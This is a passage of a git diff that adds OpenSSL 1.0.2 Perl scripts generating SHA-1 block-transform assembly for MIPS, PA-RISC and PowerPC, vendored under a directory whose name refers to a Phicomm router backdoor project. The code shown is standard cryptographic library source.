+	rotr	$b,$b,2
+	addu	$e,$t0
+#else
+	 xor	@X[$j%16],@X[($j+2)%16]
+	sll	$t0,$a,5	# $i
+	addu	$e,$K
+	srl	$t1,$a,27
+	addu	$e,$t0
+	 xor	@X[$j%16],@X[($j+8)%16]
+	xor	$t0,$c,$d
+	addu	$e,$t1
+	 xor	@X[$j%16],@X[($j+13)%16]
+	sll	$t2,$b,30
+	and	$t0,$b
+	 srl	$t1,@X[$j%16],31
+	 addu	@X[$j%16],@X[$j%16]
+	srl	$b,$b,2
+	xor	$t0,$d
+	 or	@X[$j%16],$t1
+	addu	$e,@X[$i%16]
+	or	$b,$t2
+	addu	$e,$t0
+#endif
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i<79);
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	 xor	@X[$j%16],@X[($j+2)%16]
+	addu	$e,$K		# $i
+	rotr	$t1,$a,27
+	 xor	@X[$j%16],@X[($j+8)%16]
+	xor	$t0,$c,$d
+	addu	$e,$t1
+	 xor	@X[$j%16],@X[($j+13)%16]
+	xor	$t0,$b
+	addu	$e,@X[$i%16]
+	 rotr	@X[$j%16],@X[$j%16],31
+	rotr	$b,$b,2
+	addu	$e,$t0
+#else
+	 xor	@X[$j%16],@X[($j+2)%16]
+	sll	$t0,$a,5	# $i
+	addu	$e,$K
+	srl	$t1,$a,27
+	addu	$e,$t0
+	 xor	@X[$j%16],@X[($j+8)%16]
+	xor	$t0,$c,$d
+	addu	$e,$t1
+	 xor	@X[$j%16],@X[($j+13)%16]
+	sll	$t2,$b,30
+	xor	$t0,$b
+	 srl	$t1,@X[$j%16],31
+	 addu	@X[$j%16],@X[$j%16]
+	srl	$b,$b,2
+	addu	$e,@X[$i%16]
+	 or	@X[$j%16],$t1
+	or	$b,$t2
+	addu	$e,$t0
+#endif
+___
+$code.=<<___ if ($i==79);
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	 lw	@X[0],0($ctx)
+	addu	$e,$K		# $i
+	 lw	@X[1],4($ctx)
+	rotr	$t1,$a,27
+	 lw	@X[2],8($ctx)
+	xor	$t0,$c,$d
+	addu	$e,$t1
+	 lw	@X[3],12($ctx)
+	xor	$t0,$b
+	addu	$e,@X[$i%16]
+	 lw	@X[4],16($ctx)
+	rotr	$b,$b,2
+	addu	$e,$t0
+#else
+	 lw	@X[0],0($ctx)
+	sll	$t0,$a,5	# $i
+	addu	$e,$K
+	 lw	@X[1],4($ctx)
+	srl	$t1,$a,27
+	addu	$e,$t0
+	 lw	@X[2],8($ctx)
+	xor	$t0,$c,$d
+	addu	$e,$t1
+	 lw	@X[3],12($ctx)
+	sll	$t2,$b,30
+	xor	$t0,$b
+	 lw	@X[4],16($ctx)
+	srl	$b,$b,2
+	addu	$e,@X[$i%16]
+	or	$b,$t2
+	addu	$e,$t0
+#endif
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i<79);
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	addu	$e,$K		# $i
+	and	$t0,$c,$d
+	 xor	@X[$j%16],@X[($j+2)%16]
+	rotr	$t1,$a,27
+	addu	$e,$t0
+	 xor	@X[$j%16],@X[($j+8)%16]
+	xor	$t0,$c,$d
+	addu	$e,$t1
+	 xor	@X[$j%16],@X[($j+13)%16]
+	and	$t0,$b
+	addu	$e,@X[$i%16]
+	 rotr	@X[$j%16],@X[$j%16],31
+	rotr	$b,$b,2
+	addu	$e,$t0
+#else
+	 xor	@X[$j%16],@X[($j+2)%16]
+	sll	$t0,$a,5	# $i
+	addu	$e,$K
+	srl	$t1,$a,27
+	addu	$e,$t0
+	 xor	@X[$j%16],@X[($j+8)%16]
+	and	$t0,$c,$d
+	addu	$e,$t1
+	 xor	@X[$j%16],@X[($j+13)%16]
+	sll	$t2,$b,30
+	addu	$e,$t0
+	 srl	$t1,@X[$j%16],31
+	xor	$t0,$c,$d
+	 addu	@X[$j%16],@X[$j%16]
+	and	$t0,$b
+	srl	$b,$b,2
+	 or	@X[$j%16],$t1
+	addu	$e,@X[$i%16]
+	or	$b,$t2
+	addu	$e,$t0
+#endif
+___
+}
+
+$FRAMESIZE=16;	# large enough to accomodate NUBI saved registers
+$SAVED_REGS_MASK = ($flavour =~ /nubi/i) ? 0xc0fff008 : 0xc0ff0000;
+
+$code=<<___;
+#ifdef OPENSSL_FIPSCANISTER
+# include <openssl/fipssyms.h>
+#endif
+
+#if defined(__mips_smartmips) && !defined(_MIPS_ARCH_MIPS32R2)
+#define _MIPS_ARCH_MIPS32R2
+#endif
+
+.text
+
+.set	noat
+.set	noreorder
+.align	5
+.globl	sha1_block_data_order
+.ent	sha1_block_data_order
+sha1_block_data_order:
+	.frame	$sp,$FRAMESIZE*$SZREG,$ra
+	.mask	$SAVED_REGS_MASK,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,$FRAMESIZE*$SZREG
+	$REG_S	$ra,($FRAMESIZE-1)*$SZREG($sp)
+	$REG_S	$fp,($FRAMESIZE-2)*$SZREG($sp)
+	$REG_S	$s11,($FRAMESIZE-3)*$SZREG($sp)
+	$REG_S	$s10,($FRAMESIZE-4)*$SZREG($sp)
+	$REG_S	$s9,($FRAMESIZE-5)*$SZREG($sp)
+	$REG_S	$s8,($FRAMESIZE-6)*$SZREG($sp)
+	$REG_S	$s7,($FRAMESIZE-7)*$SZREG($sp)
+	$REG_S	$s6,($FRAMESIZE-8)*$SZREG($sp)
+	$REG_S	$s5,($FRAMESIZE-9)*$SZREG($sp)
+	$REG_S	$s4,($FRAMESIZE-10)*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);	# optimize non-nubi prologue
+	$REG_S	$s3,($FRAMESIZE-11)*$SZREG($sp)
+	$REG_S	$s2,($FRAMESIZE-12)*$SZREG($sp)
+	$REG_S	$s1,($FRAMESIZE-13)*$SZREG($sp)
+	$REG_S	$s0,($FRAMESIZE-14)*$SZREG($sp)
+	$REG_S	$gp,($FRAMESIZE-15)*$SZREG($sp)
+___
+$code.=<<___;
+	$PTR_SLL $num,6
+	$PTR_ADD $num,$inp
+	$REG_S	$num,0($sp)
+	lw	$A,0($ctx)
+	lw	$B,4($ctx)
+	lw	$C,8($ctx)
+	lw	$D,12($ctx)
+	b	.Loop
+	lw	$E,16($ctx)
+.align	4
+.Loop:
+	.set	reorder
+	lwl	@X[0],$MSB($inp)
+	lui	$K,0x5a82
+	lwr	@X[0],$LSB($inp)
+	ori	$K,0x7999	# K_00_19
+___
+for ($i=0;$i<15;$i++)	{ &BODY_00_14($i,@V); unshift(@V,pop(@V)); }
+for (;$i<20;$i++)	{ &BODY_15_19($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	lui	$K,0x6ed9
+	ori	$K,0xeba1	# K_20_39
+___
+for (;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	lui	$K,0x8f1b
+	ori	$K,0xbcdc	# K_40_59
+___
+for (;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	lui	$K,0xca62
+	ori	$K,0xc1d6	# K_60_79
+___
+for (;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	$PTR_ADD $inp,64
+	$REG_L	$num,0($sp)
+
+	addu	$A,$X[0]
+	addu	$B,$X[1]
+	sw	$A,0($ctx)
+	addu	$C,$X[2]
+	addu	$D,$X[3]
+	sw	$B,4($ctx)
+	addu	$E,$X[4]
+	sw	$C,8($ctx)
+	sw	$D,12($ctx)
+	sw	$E,16($ctx)
+	.set	noreorder
+	bne	$inp,$num,.Loop
+	nop
+
+	.set	noreorder
+	$REG_L	$ra,($FRAMESIZE-1)*$SZREG($sp)
+	$REG_L	$fp,($FRAMESIZE-2)*$SZREG($sp)
+	$REG_L	$s11,($FRAMESIZE-3)*$SZREG($sp)
+	$REG_L	$s10,($FRAMESIZE-4)*$SZREG($sp)
+	$REG_L	$s9,($FRAMESIZE-5)*$SZREG($sp)
+	$REG_L	$s8,($FRAMESIZE-6)*$SZREG($sp)
+	$REG_L	$s7,($FRAMESIZE-7)*$SZREG($sp)
+	$REG_L	$s6,($FRAMESIZE-8)*$SZREG($sp)
+	$REG_L	$s5,($FRAMESIZE-9)*$SZREG($sp)
+	$REG_L	$s4,($FRAMESIZE-10)*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$s3,($FRAMESIZE-11)*$SZREG($sp)
+	$REG_L	$s2,($FRAMESIZE-12)*$SZREG($sp)
+	$REG_L	$s1,($FRAMESIZE-13)*$SZREG($sp)
+	$REG_L	$s0,($FRAMESIZE-14)*$SZREG($sp)
+	$REG_L	$gp,($FRAMESIZE-15)*$SZREG($sp)
+___
+$code.=<<___;
+	jr	$ra
+	$PTR_ADD $sp,$FRAMESIZE*$SZREG
+.end	sha1_block_data_order
+.rdata
+.asciiz	"SHA1 for MIPS, CRYPTOGAMS by <appro\@openssl.org>"
+___
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-parisc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-parisc.pl
new file mode 100644
index 0000000..6e5a328
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-parisc.pl
@@ -0,0 +1,260 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA1 block procedure for PA-RISC.
+
+# June 2009.
+#
+# On PA-7100LC performance is >30% better than gcc 3.2 generated code
+# for aligned input and >50% better for unaligned. Compared to vendor
+# compiler on PA-8600 it's almost 60% faster in 64-bit build and just
+# few percent faster in 32-bit one (this for aligned input, data for
+# unaligned input is not available).
+#
+# Special thanks to polarhome.com for providing HP-UX account.
+
+$flavour = shift;
+$output = shift;
+open STDOUT,">$output";
+
+if ($flavour =~ /64/) {
+	$LEVEL		="2.0W";
+	$SIZE_T		=8;
+	$FRAME_MARKER	=80;
+	$SAVED_RP	=16;
+	$PUSH		="std";
+	$PUSHMA		="std,ma";
+	$POP		="ldd";
+	$POPMB		="ldd,mb";
+} else {
+	$LEVEL		="1.0";
+	$SIZE_T		=4;
+	$FRAME_MARKER	=48;
+	$SAVED_RP	=20;
+	$PUSH		="stw";
+	$PUSHMA		="stwm";
+	$POP		="ldw";
+	$POPMB		="ldwm";
+}
+
+$FRAME=14*$SIZE_T+$FRAME_MARKER;# 14 saved regs + frame marker
+				#                 [+ argument transfer]
+$ctx="%r26";		# arg0
+$inp="%r25";		# arg1
+$num="%r24";		# arg2
+
+$t0="%r28";
+$t1="%r29";
+$K="%r31";
+
+@X=("%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", "%r8",
+    "%r9", "%r10","%r11","%r12","%r13","%r14","%r15","%r16",$t0);
+
+@V=($A,$B,$C,$D,$E)=("%r19","%r20","%r21","%r22","%r23");
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i<15);
+	addl	$K,$e,$e	; $i
+	shd	$a,$a,27,$t1
+	addl	@X[$i],$e,$e
+	and	$c,$b,$t0
+	addl	$t1,$e,$e
+	andcm	$d,$b,$t1
+	shd	$b,$b,2,$b
+	or	$t1,$t0,$t0
+	addl	$t0,$e,$e
+___
+$code.=<<___ if ($i>=15);	# with forward Xupdate
+	addl	$K,$e,$e	; $i
+	shd	$a,$a,27,$t1
+	xor	@X[($j+2)%16],@X[$j%16],@X[$j%16]
+	addl	@X[$i%16],$e,$e
+	and	$c,$b,$t0
+	xor	@X[($j+8)%16],@X[$j%16],@X[$j%16]
+	addl	$t1,$e,$e
+	andcm	$d,$b,$t1
+	shd	$b,$b,2,$b
+	or	$t1,$t0,$t0
+	xor	@X[($j+13)%16],@X[$j%16],@X[$j%16]
+	add	$t0,$e,$e
+	shd	@X[$j%16],@X[$j%16],31,@X[$j%16]
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i<79);
+	xor	@X[($j+2)%16],@X[$j%16],@X[$j%16]	; $i
+	addl	$K,$e,$e
+	shd	$a,$a,27,$t1
+	xor	@X[($j+8)%16],@X[$j%16],@X[$j%16]
+	addl	@X[$i%16],$e,$e
+	xor	$b,$c,$t0
+	xor	@X[($j+13)%16],@X[$j%16],@X[$j%16]
+	addl	$t1,$e,$e
+	shd	$b,$b,2,$b
+	xor	$d,$t0,$t0
+	shd	@X[$j%16],@X[$j%16],31,@X[$j%16]
+	addl	$t0,$e,$e
+___
+$code.=<<___ if ($i==79);	# with context load
+	ldw	0($ctx),@X[0]	; $i
+	addl	$K,$e,$e
+	shd	$a,$a,27,$t1
+	ldw	4($ctx),@X[1]
+	addl	@X[$i%16],$e,$e
+	xor	$b,$c,$t0
+	ldw	8($ctx),@X[2]
+	addl	$t1,$e,$e
+	shd	$b,$b,2,$b
+	xor	$d,$t0,$t0
+	ldw	12($ctx),@X[3]
+	addl	$t0,$e,$e
+	ldw	16($ctx),@X[4]
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___;
+	shd	$a,$a,27,$t1	; $i
+	addl	$K,$e,$e
+	xor	@X[($j+2)%16],@X[$j%16],@X[$j%16]
+	xor	$d,$c,$t0
+	addl	@X[$i%16],$e,$e
+	xor	@X[($j+8)%16],@X[$j%16],@X[$j%16]
+	and	$b,$t0,$t0
+	addl	$t1,$e,$e
+	shd	$b,$b,2,$b
+	xor	@X[($j+13)%16],@X[$j%16],@X[$j%16]
+	addl	$t0,$e,$e
+	and	$d,$c,$t1
+	shd	@X[$j%16],@X[$j%16],31,@X[$j%16]
+	addl	$t1,$e,$e
+___
+}
+
+$code=<<___;
+	.LEVEL	$LEVEL
+	.SPACE	\$TEXT\$
+	.SUBSPA	\$CODE\$,QUAD=0,ALIGN=8,ACCESS=0x2C,CODE_ONLY
+
+	.EXPORT	sha1_block_data_order,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR
+sha1_block_data_order
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-14*$SIZE_T`,NO_CALLS,SAVE_RP,ENTRY_GR=16
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)	; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+	$PUSH	%r7,`-$FRAME+4*$SIZE_T`(%sp)
+	$PUSH	%r8,`-$FRAME+5*$SIZE_T`(%sp)
+	$PUSH	%r9,`-$FRAME+6*$SIZE_T`(%sp)
+	$PUSH	%r10,`-$FRAME+7*$SIZE_T`(%sp)
+	$PUSH	%r11,`-$FRAME+8*$SIZE_T`(%sp)
+	$PUSH	%r12,`-$FRAME+9*$SIZE_T`(%sp)
+	$PUSH	%r13,`-$FRAME+10*$SIZE_T`(%sp)
+	$PUSH	%r14,`-$FRAME+11*$SIZE_T`(%sp)
+	$PUSH	%r15,`-$FRAME+12*$SIZE_T`(%sp)
+	$PUSH	%r16,`-$FRAME+13*$SIZE_T`(%sp)
+
+	ldw	0($ctx),$A
+	ldw	4($ctx),$B
+	ldw	8($ctx),$C
+	ldw	12($ctx),$D
+	ldw	16($ctx),$E
+
+	extru	$inp,31,2,$t0		; t0=inp&3;
+	sh3addl	$t0,%r0,$t0		; t0*=8;
+	subi	32,$t0,$t0		; t0=32-t0;
+	mtctl	$t0,%cr11		; %sar=t0;
+
+L\$oop
+	ldi	3,$t0
+	andcm	$inp,$t0,$t0		; 64-bit neutral
+___
+	for ($i=0;$i<15;$i++) {		# load input block
+	$code.="\tldw	`4*$i`($t0),@X[$i]\n";		}
+$code.=<<___;
+	cmpb,*=	$inp,$t0,L\$aligned
+	ldw	60($t0),@X[15]
+	ldw	64($t0),@X[16]
+___
+	for ($i=0;$i<16;$i++) {		# align input
+	$code.="\tvshd	@X[$i],@X[$i+1],@X[$i]\n";	}
+$code.=<<___;
+L\$aligned
+	ldil	L'0x5a827000,$K		; K_00_19
+	ldo	0x999($K),$K
+___
+for ($i=0;$i<20;$i++)   { &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	ldil	L'0x6ed9e000,$K		; K_20_39
+	ldo	0xba1($K),$K
+___
+
+for (;$i<40;$i++)       { &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	ldil	L'0x8f1bb000,$K		; K_40_59
+	ldo	0xcdc($K),$K
+___
+
+for (;$i<60;$i++)       { &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	ldil	L'0xca62c000,$K		; K_60_79
+	ldo	0x1d6($K),$K
+___
+for (;$i<80;$i++)       { &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+
+$code.=<<___;
+	addl	@X[0],$A,$A
+	addl	@X[1],$B,$B
+	addl	@X[2],$C,$C
+	addl	@X[3],$D,$D
+	addl	@X[4],$E,$E
+	stw	$A,0($ctx)
+	stw	$B,4($ctx)
+	stw	$C,8($ctx)
+	stw	$D,12($ctx)
+	stw	$E,16($ctx)
+	addib,*<> -1,$num,L\$oop
+	ldo	64($inp),$inp
+
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2	; standard epilogue
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+	$POP	`-$FRAME+4*$SIZE_T`(%sp),%r7
+	$POP	`-$FRAME+5*$SIZE_T`(%sp),%r8
+	$POP	`-$FRAME+6*$SIZE_T`(%sp),%r9
+	$POP	`-$FRAME+7*$SIZE_T`(%sp),%r10
+	$POP	`-$FRAME+8*$SIZE_T`(%sp),%r11
+	$POP	`-$FRAME+9*$SIZE_T`(%sp),%r12
+	$POP	`-$FRAME+10*$SIZE_T`(%sp),%r13
+	$POP	`-$FRAME+11*$SIZE_T`(%sp),%r14
+	$POP	`-$FRAME+12*$SIZE_T`(%sp),%r15
+	$POP	`-$FRAME+13*$SIZE_T`(%sp),%r16
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+	.STRINGZ "SHA1 block transform for PA-RISC, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/,\*/,/gm		if ($SIZE_T==4);
+$code =~ s/\bbv\b/bve/gm	if ($SIZE_T==8);
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-ppc.pl
new file mode 100755
index 0000000..df59896
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-ppc.pl
@@ -0,0 +1,344 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# I let hardware handle unaligned input(*), except on page boundaries
+# (see below for details). Otherwise straightforward implementation
+# with X vector in register bank.
+#
+# (*) this means that this module is inappropriate for PPC403? Does
+#     anybody know if pre-POWER3 can sustain unaligned load?
+
+# 			-m64	-m32
+# ----------------------------------
+# PPC970,gcc-4.0.0	+76%	+59%
+# Power6,xlc-7		+68%	+33%
+
+$flavour = shift;
+
+if ($flavour =~ /64/) {
+	$SIZE_T	=8;
+	$LRSAVE	=2*$SIZE_T;
+	$UCMP	="cmpld";
+	$STU	="stdu";
+	$POP	="ld";
+	$PUSH	="std";
+} elsif ($flavour =~ /32/) {
+	$SIZE_T	=4;
+	$LRSAVE	=$SIZE_T;
+	$UCMP	="cmplw";
+	$STU	="stwu";
+	$POP	="lwz";
+	$PUSH	="stw";
+} else { die "nonsense $flavour"; }
+
+# Define endianess based on flavour
+# i.e.: linux64le
+$LITTLE_ENDIAN = ($flavour=~/le$/) ? $SIZE_T : 0;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+$FRAME=24*$SIZE_T+64;
+$LOCALS=6*$SIZE_T;
+
+$K  ="r0";
+$sp ="r1";
+$toc="r2";
+$ctx="r3";
+$inp="r4";
+$num="r5";
+$t0 ="r15";
+$t1 ="r6";
+
+$A  ="r7";
+$B  ="r8";
+$C  ="r9";
+$D  ="r10";
+$E  ="r11";
+$T  ="r12";
+
+@V=($A,$B,$C,$D,$E,$T);
+@X=("r16","r17","r18","r19","r20","r21","r22","r23",
+    "r24","r25","r26","r27","r28","r29","r30","r31");
+
+sub loadbe {
+my ($dst, $src, $temp_reg) = @_;
+$code.=<<___ if (!$LITTLE_ENDIAN);
+	lwz	$dst,$src
+___
+$code.=<<___ if ($LITTLE_ENDIAN);
+	lwz	$temp_reg,$src
+	rotlwi	$dst,$temp_reg,8
+	rlwimi	$dst,$temp_reg,24,0,7
+	rlwimi	$dst,$temp_reg,24,16,23
+___
+}
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e,$f)=@_;
+my $j=$i+1;
+
+	# Since the last value of $f is discarded, we can use
+	# it as a temp reg to swap byte-order when needed.
+	loadbe("@X[$i]","`$i*4`($inp)",$f) if ($i==0);
+	loadbe("@X[$j]","`$j*4`($inp)",$f) if ($i<15);
+$code.=<<___ if ($i<15);
+	add	$f,$K,$e
+	rotlwi	$e,$a,5
+	add	$f,$f,@X[$i]
+	and	$t0,$c,$b
+	add	$f,$f,$e
+	andc	$t1,$d,$b
+	rotlwi	$b,$b,30
+	or	$t0,$t0,$t1
+	add	$f,$f,$t0
+___
+$code.=<<___ if ($i>=15);
+	add	$f,$K,$e
+	rotlwi	$e,$a,5
+	xor	@X[$j%16],@X[$j%16],@X[($j+2)%16]
+	add	$f,$f,@X[$i%16]
+	and	$t0,$c,$b
+	xor	@X[$j%16],@X[$j%16],@X[($j+8)%16]
+	add	$f,$f,$e
+	andc	$t1,$d,$b
+	rotlwi	$b,$b,30
+	or	$t0,$t0,$t1
+	xor	@X[$j%16],@X[$j%16],@X[($j+13)%16]
+	add	$f,$f,$t0
+	rotlwi	@X[$j%16],@X[$j%16],1
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e,$f)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i<79);
+	add	$f,$K,$e
+	xor	$t0,$b,$d
+	rotlwi	$e,$a,5
+	xor	@X[$j%16],@X[$j%16],@X[($j+2)%16]
+	add	$f,$f,@X[$i%16]
+	xor	$t0,$t0,$c
+	xor	@X[$j%16],@X[$j%16],@X[($j+8)%16]
+	add	$f,$f,$t0
+	rotlwi	$b,$b,30
+	xor	@X[$j%16],@X[$j%16],@X[($j+13)%16]
+	add	$f,$f,$e
+	rotlwi	@X[$j%16],@X[$j%16],1
+___
+$code.=<<___ if ($i==79);
+	add	$f,$K,$e
+	xor	$t0,$b,$d
+	rotlwi	$e,$a,5
+	lwz	r16,0($ctx)
+	add	$f,$f,@X[$i%16]
+	xor	$t0,$t0,$c
+	lwz	r17,4($ctx)
+	add	$f,$f,$t0
+	rotlwi	$b,$b,30
+	lwz	r18,8($ctx)
+	lwz	r19,12($ctx)
+	add	$f,$f,$e
+	lwz	r20,16($ctx)
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e,$f)=@_;
+my $j=$i+1;
+$code.=<<___;
+	add	$f,$K,$e
+	rotlwi	$e,$a,5
+	xor	@X[$j%16],@X[$j%16],@X[($j+2)%16]
+	add	$f,$f,@X[$i%16]
+	and	$t0,$b,$c
+	xor	@X[$j%16],@X[$j%16],@X[($j+8)%16]
+	add	$f,$f,$e
+	or	$t1,$b,$c
+	rotlwi	$b,$b,30
+	xor	@X[$j%16],@X[$j%16],@X[($j+13)%16]
+	and	$t1,$t1,$d
+	or	$t0,$t0,$t1
+	rotlwi	@X[$j%16],@X[$j%16],1
+	add	$f,$f,$t0
+___
+}
+
+$code=<<___;
+.machine	"any"
+.text
+
+.globl	.sha1_block_data_order
+.align	4
+.sha1_block_data_order:
+	$STU	$sp,-$FRAME($sp)
+	mflr	r0
+	$PUSH	r15,`$FRAME-$SIZE_T*17`($sp)
+	$PUSH	r16,`$FRAME-$SIZE_T*16`($sp)
+	$PUSH	r17,`$FRAME-$SIZE_T*15`($sp)
+	$PUSH	r18,`$FRAME-$SIZE_T*14`($sp)
+	$PUSH	r19,`$FRAME-$SIZE_T*13`($sp)
+	$PUSH	r20,`$FRAME-$SIZE_T*12`($sp)
+	$PUSH	r21,`$FRAME-$SIZE_T*11`($sp)
+	$PUSH	r22,`$FRAME-$SIZE_T*10`($sp)
+	$PUSH	r23,`$FRAME-$SIZE_T*9`($sp)
+	$PUSH	r24,`$FRAME-$SIZE_T*8`($sp)
+	$PUSH	r25,`$FRAME-$SIZE_T*7`($sp)
+	$PUSH	r26,`$FRAME-$SIZE_T*6`($sp)
+	$PUSH	r27,`$FRAME-$SIZE_T*5`($sp)
+	$PUSH	r28,`$FRAME-$SIZE_T*4`($sp)
+	$PUSH	r29,`$FRAME-$SIZE_T*3`($sp)
+	$PUSH	r30,`$FRAME-$SIZE_T*2`($sp)
+	$PUSH	r31,`$FRAME-$SIZE_T*1`($sp)
+	$PUSH	r0,`$FRAME+$LRSAVE`($sp)
+	lwz	$A,0($ctx)
+	lwz	$B,4($ctx)
+	lwz	$C,8($ctx)
+	lwz	$D,12($ctx)
+	lwz	$E,16($ctx)
+	andi.	r0,$inp,3
+	bne	Lunaligned
+Laligned:
+	mtctr	$num
+	bl	Lsha1_block_private
+	b	Ldone
+
+; PowerPC specification allows an implementation to be ill-behaved
+; upon unaligned access which crosses page boundary. "Better safe
+; than sorry" principle makes me treat it specially. But I don't
+; look for particular offending word, but rather for 64-byte input
+; block which crosses the boundary. Once found that block is aligned
+; and hashed separately...
+.align	4
+Lunaligned:
+	subfic	$t1,$inp,4096
+	andi.	$t1,$t1,4095	; distance to closest page boundary
+	srwi.	$t1,$t1,6	; t1/=64
+	beq	Lcross_page
+	$UCMP	$num,$t1
+	ble-	Laligned	; didn't cross the page boundary
+	mtctr	$t1
+	subfc	$num,$t1,$num
+	bl	Lsha1_block_private
+Lcross_page:
+	li	$t1,16
+	mtctr	$t1
+	addi	r20,$sp,$LOCALS	; spot within the frame
+Lmemcpy:
+	lbz	r16,0($inp)
+	lbz	r17,1($inp)
+	lbz	r18,2($inp)
+	lbz	r19,3($inp)
+	addi	$inp,$inp,4
+	stb	r16,0(r20)
+	stb	r17,1(r20)
+	stb	r18,2(r20)
+	stb	r19,3(r20)
+	addi	r20,r20,4
+	bdnz	Lmemcpy
+
+	$PUSH	$inp,`$FRAME-$SIZE_T*18`($sp)
+	li	$t1,1
+	addi	$inp,$sp,$LOCALS
+	mtctr	$t1
+	bl	Lsha1_block_private
+	$POP	$inp,`$FRAME-$SIZE_T*18`($sp)
+	addic.	$num,$num,-1
+	bne-	Lunaligned
+
+Ldone:
+	$POP	r0,`$FRAME+$LRSAVE`($sp)
+	$POP	r15,`$FRAME-$SIZE_T*17`($sp)
+	$POP	r16,`$FRAME-$SIZE_T*16`($sp)
+	$POP	r17,`$FRAME-$SIZE_T*15`($sp)
+	$POP	r18,`$FRAME-$SIZE_T*14`($sp)
+	$POP	r19,`$FRAME-$SIZE_T*13`($sp)
+	$POP	r20,`$FRAME-$SIZE_T*12`($sp)
+	$POP	r21,`$FRAME-$SIZE_T*11`($sp)
+	$POP	r22,`$FRAME-$SIZE_T*10`($sp)
+	$POP	r23,`$FRAME-$SIZE_T*9`($sp)
+	$POP	r24,`$FRAME-$SIZE_T*8`($sp)
+	$POP	r25,`$FRAME-$SIZE_T*7`($sp)
+	$POP	r26,`$FRAME-$SIZE_T*6`($sp)
+	$POP	r27,`$FRAME-$SIZE_T*5`($sp)
+	$POP	r28,`$FRAME-$SIZE_T*4`($sp)
+	$POP	r29,`$FRAME-$SIZE_T*3`($sp)
+	$POP	r30,`$FRAME-$SIZE_T*2`($sp)
+	$POP	r31,`$FRAME-$SIZE_T*1`($sp)
+	mtlr	r0
+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,4,1,0x80,18,3,0
+	.long	0
+___
+
+# This is private block function, which uses tailored calling
+# interface, namely upon entry SHA_CTX is pre-loaded to given
